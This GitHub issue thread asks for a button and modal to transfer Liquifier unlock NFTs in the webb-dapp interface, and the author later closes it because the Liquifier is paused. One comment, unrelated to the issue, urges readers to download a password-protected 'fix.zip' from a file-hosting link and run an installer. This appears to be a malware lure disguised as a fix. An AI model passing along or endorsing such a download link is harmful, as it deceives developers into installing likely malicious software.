### ISSUE TITLE
[FEAT] Add ability to transfer Liquifier unlock NFTs

### ISSUE THREAD

**Issue by yurixander** [webb-tools/webb-dapp#2527]
- When users interact with the Liquifier and request to unlock a given amount, they receive an NFT.
- That NFT contains metadata about the unstaking request, such as unlock ID, amount, and more.
- They can then redeem it for the underlying tokens.
- Currently, the only action that can be performed for that NFT on the UI is to withdraw/redeem them.
- Need to add a button and show a transfer modal to allow users to transfer them to others.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yurixander** [comment]
Closing this as Liquifier put on pause. If anything, I'll re-open.
